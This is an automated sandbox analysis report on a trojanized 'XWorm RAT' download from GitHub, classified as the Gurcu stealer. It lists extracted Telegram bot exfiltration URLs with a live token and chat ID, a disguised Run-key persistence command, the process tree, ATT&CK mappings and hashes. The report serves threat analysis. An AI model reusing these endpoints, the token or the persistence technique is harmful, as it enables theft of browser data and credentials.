Resubmissions
09-01-2025 19:49
250109-yjtbhs1nck 1009-01-2025 19:48
250109-yjlaxa1nbq 309-01-2025 18:48
250109-xf75tszlcj 1009-01-2025 18:45
250109-xeef5azkfp 1009-01-2025 18:34
250109-w7sc1szjak 1009-01-2025 18:31
250109-w54y2axkf1 1003-01-2025 17:08
250103-vntw3atqdt 1003-01-2025 15:27
250103-svv2latmgr 1003-01-2025 15:23
250103-sslp5stlhk 10Analysis
-
max time kernel
1270s -
max time network
1271s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-01-2025 19:49
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
Resource
win10v2004-20241007-en
General
-
Target
https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.21%20kb
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=-1002258988684
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Command Reciever.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation conhost.exe -
Executes dropped EXE 2 IoCs
pid Process 1484 Command Reciever.exe 2900 conhost.exe -
Loads dropped DLL 2 IoCs
pid Process 1484 Command Reciever.exe 2900 conhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeUpdate\\conhost.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 83 raw.githubusercontent.com 78 raw.githubusercontent.com 79 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 76 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3236 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XWorm RAT V2.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Command Reciever.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Command Reciever.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Command Reciever.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier conhost.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3228 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4628 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1628 msedge.exe 1628 msedge.exe 4284 msedge.exe 4284 msedge.exe 2732 identity_helper.exe 2732 identity_helper.exe 2220 msedge.exe 2220 msedge.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 1484 Command Reciever.exe 3984 Command Reciever.exe 3984 Command Reciever.exe 3984 Command Reciever.exe 3984 Command Reciever.exe 3984 Command Reciever.exe 3984 Command Reciever.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 2900 conhost.exe 3984 Command Reciever.exe 3984 Command Reciever.exe 3984 Command Reciever.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3984 Command Reciever.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1484 Command Reciever.exe Token: SeDebugPrivilege 3236 tasklist.exe Token: SeDebugPrivilege 2900 conhost.exe -
Suspicious use of FindShellTrayWindow 57 IoCs
pid Process 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 3984 Command Reciever.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 4284 msedge.exe 3984 Command Reciever.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2900 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4284 wrote to memory of 2460 4284 msedge.exe 83 PID 4284 wrote to memory of 2460 4284 msedge.exe 83 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 2920 4284 msedge.exe 84 PID 4284 wrote to memory of 1628 4284 msedge.exe 85 PID 4284 wrote to memory of 1628 4284 msedge.exe 85 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86 PID 4284 wrote to memory of 3956 4284 msedge.exe 86
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Intestio/XWorm-RAT/releases/tag/xworm1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa333046f8,0x7ffa33304708,0x7ffa333047182⤵PID:2460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:22⤵PID:2920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:82⤵PID:3956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:12⤵PID:2008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:12⤵PID:2504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:82⤵PID:2020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:12⤵PID:4824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:12⤵PID:4564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:12⤵PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:12⤵PID:3560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5796 /prefetch:82⤵PID:1960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:12⤵PID:5012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,16987766865330204998,2969409828798625851,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1804 /prefetch:22⤵PID:5512
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1672
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3076
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1232
-
C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"1⤵
- System Location Discovery: System Language Discovery
PID:3768 -
C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"2⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3984
-
-
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp897E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp897E.tmp.bat3⤵PID:3088
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:3064
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1484"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3236
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:3624
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:3228
-
-
C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2900 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f5⤵PID:1084
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f6⤵
- Adds Run key to start application
- Modifies registry key
PID:4628
-
-
-
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:4084
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10KB
MD54a7363bdad7b8e31cf61cc5c30bf11c2
SHA1994e14aa30f1de044357746a3d43229e4821575a
SHA25698c7949f65823d97be76d14bc04c5418f7877f26ffe9ac995c5ade79ed6641b1
SHA512ff13fa46f0fef7400c607678a36c8ddddd95ef449d07526b118a44d6703fbf154bc70f0ef52e0cd4f453ed01cf8dcb2f6df4c19c81fb9587aa6e873b171a9f76
-
Filesize
152B
MD5bffcefacce25cd03f3d5c9446ddb903d
SHA18923f84aa86db316d2f5c122fe3874bbe26f3bab
SHA25623e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405
SHA512761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7
-
Filesize
152B
MD5d22073dea53e79d9b824f27ac5e9813e
SHA16d8a7281241248431a1571e6ddc55798b01fa961
SHA25686713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6
SHA51297152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1KB
MD55826e7134ae2c785ed20a07c984fe62c
SHA144c3e008d13fa5916cb1e75a544bfc67b7f6281e
SHA256383180c2ea9c2bef128cfb9fdfcaa0a9f81e3c5857d9555fd365d8e6ab27b1a3
SHA512343b5889d64aa63e74fec05ec64486c399b6b8babdee1ed1dfcc783c568a40aa8681ea410d65d2f26d6ec9c779965b4fea3c61379ac46dd6919eb3f8f158fd3a
-
Filesize
124KB
MD51138984367015dc082ef49f4526122c1
SHA1cb9c60167fb7a0f8f95ad3e41e2d7bca5dbc7162
SHA2567c53cc2457c5ba0d61f60a54507624514537e8cdaff7163fe95bddadfe04fe2b
SHA5126991569f708d9730679fd84e332a077bd62669cb8412bca560ce3ea18fd7cb71f9067664db24a1353f2da108b6e914275248628b540b8f0d2b00efc1809d0590
-
Filesize
573B
MD52e6e73e80e60a9a61925cba10636e275
SHA1eca781f9e0637616ba50e634ebef795e6d63c054
SHA256a361999a859cb53b7a91663ac16c05ee90f570d8b8bef391aee55471226d5401
SHA51244c7e45cbf391a13ae2ac1b2c5360d1097eb8d2d7218d6027e48f5b6b6ab6b68da46fe278bb3ff29fd3696f308450fe706e3335ddbbc61f16fc79a66b7d9dfc1
-
Filesize
6KB
MD5984749c152c9b524c79d4ee9d9043080
SHA13452643a1285fae9a1608684666df6daf76d7432
SHA25612666bf89d914d35d7c7ecd214d447f9642876066faaa66c4679b3a9cc93fcd4
SHA512afadc891d10693a637e2beb37e458a4ded971a0e68629bad167be3dfe6dfc03423c097f914b323b6b78aacb14178f02096c4fb769799bb8c4d5efe8a781fbdca
-
Filesize
5KB
MD520881ca26b8f06256bf3bbca137c28cb
SHA1618cd53e17f11746a94902fc28555b54303e609a
SHA2566722969d7a44b9d24e6f2e49f6b07be384dcfbc83390db3e14545718f8d02466
SHA512eafe2a9c16508edf5067411196c06dcb4938f6b186028e793af865184439604f9b8526f629e0e19aae490d1174b2d4b7428050662d52681e0d69aa8a1abf4a8d
-
Filesize
6KB
MD5f0773bb5ffa65760167c2d84d617ae20
SHA14c15b87a55c0d93c33821783fc463677400011d2
SHA2567f742e7b2e686a59c33d8f48f37c2dfd6c2b8b6ccafd2f2927976a7c09bc8cf1
SHA512bdc759c9f698d75f4361440daf03d49d9253f4b323a2c6ffe1bfa1ccccf361317a8fca962a2c5236ad10614ee11c3f716e150227d3f760a9750b75bb262fcb5a
-
Filesize
1KB
MD5fa9da5878a6ae97f22b7177685d82648
SHA1f2902b59e3037b97d9e1ccb8fa2367eea03e042e
SHA256e1ec5986da28cef02f9bf1103897f7e11d2d2722fdcd13a7050abe8bd5a77fe1
SHA51260b13b7981f1c71952f00e84848ad861bf97a5529d91e1fc46f96f55f5afd298c2d8db9d73098224ae0d9ab6b654e38271f1746c733fcb91bb64308d1351c8b0
-
Filesize
1KB
MD5d7d693a5e6db522bb3a9eff2d0c99fc6
SHA1812d07c19ad17fbe865ddcae606141b7a13706d0
SHA256a65cc71dd4bb5c2d81e9c92c94a5b54c8737a77d2c41ed832bfa745d52183afc
SHA512777e5b954ec3545be9c8286dca5fc6d00e9ca8e8f65a36f5591d65219445ce2b27fdd83858986d5ff0114018ef80f62be52f16099e671351c1b17c0ce85c67e1
-
Filesize
1KB
MD57f847f91c24d5abd726244eae1aa2986
SHA11457f1d6d94f43187e0cefce6385c32c5c6b7cbf
SHA256294cfd3db5d43324be22cc4b891d13bc08cf6d4969eba94d6c3330d2fae269c1
SHA51217f3ccae5581269fef11fcef155fe7c574cb3240ea1125dc68f5560f5cfca6346dae333633a6113957fcaa5366b38e391e79a3305ead1147fb24e6ff32215316
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
